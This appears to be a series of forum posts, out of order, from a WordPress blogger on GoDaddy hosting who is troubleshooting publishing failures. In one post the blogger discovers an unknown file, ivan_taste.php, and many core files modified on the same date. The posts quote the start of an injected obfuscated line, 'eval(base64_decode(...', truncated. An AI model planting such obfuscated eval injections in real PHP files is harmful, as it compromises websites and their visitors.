Thanks so much for that. I deleted it.

It seems most other files from admin-ajax.php down have all been changed on April 17th at the same time.

When I open them, they all start the same as that ivan file

“<?php /**/ eval(base64_decode(“aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21yX25….”

and this continues for about 40 lines. Any advice.

Should I reinstall all those WP files again?

So I opened my FTP client to check my .htaccess file (which I think is fine) and I noticed there is a file called ivan_taste.php in there in the root.

When I checked my local backups folder, that file wasn’t there when I last copied the files and folders which was March 28.

It says this changed was changed April 17th. Any ideas what this file is? I opened it in Dreamweaver and it just gobbledygook to me.

It seems to be working fine after I did what you recommended. What I was trying to do earlier was install WP in another one of my domains and got it horribly wrong!

Seems I overwrote the config.php for my original blog in the process but I got that changed. I wasn’t anywhere near the .htaccess file but obviously I managed to mess it up somehow.

No, I didn’t change anything.

That’s the reason why I thought it had to be something to do with the fact that I was still using WP 2.6. So I upgraded to 2.8 and the problem persists.

I reset via phpMyAdmin but once again this didn’t resolve the issue.

If anyone has had a similar experience and resolved it, I’d like to hear from you.

I changed the permalink structure, still no change.

To be honest I don’t know what type of server it is. It’s unlimited hosting from GoDaddy.

So I disabled plugins, didn’t make any difference.
I uninstalled gears, no difference.
Changed to default theme, no difference.
Tried different browsers, no difference.

I was using version 2.6 when this started happening so I thought an upgrade would take care of it. I’m now using 2.8.4 and it I still can’t publish and it saves about the first 50% of my post content.

Any other ideas would be very welcome guys.

You’ve picked me up wrong.

What I did was upload all the new files except the modified ones in wp-content. wp-content is pretty much the same as it was with the old version.

wp-admin, wp-inculdes and the rest of the files have been all updated. I also input my details into config-sample and renamed it to config.php as the codex suggests.
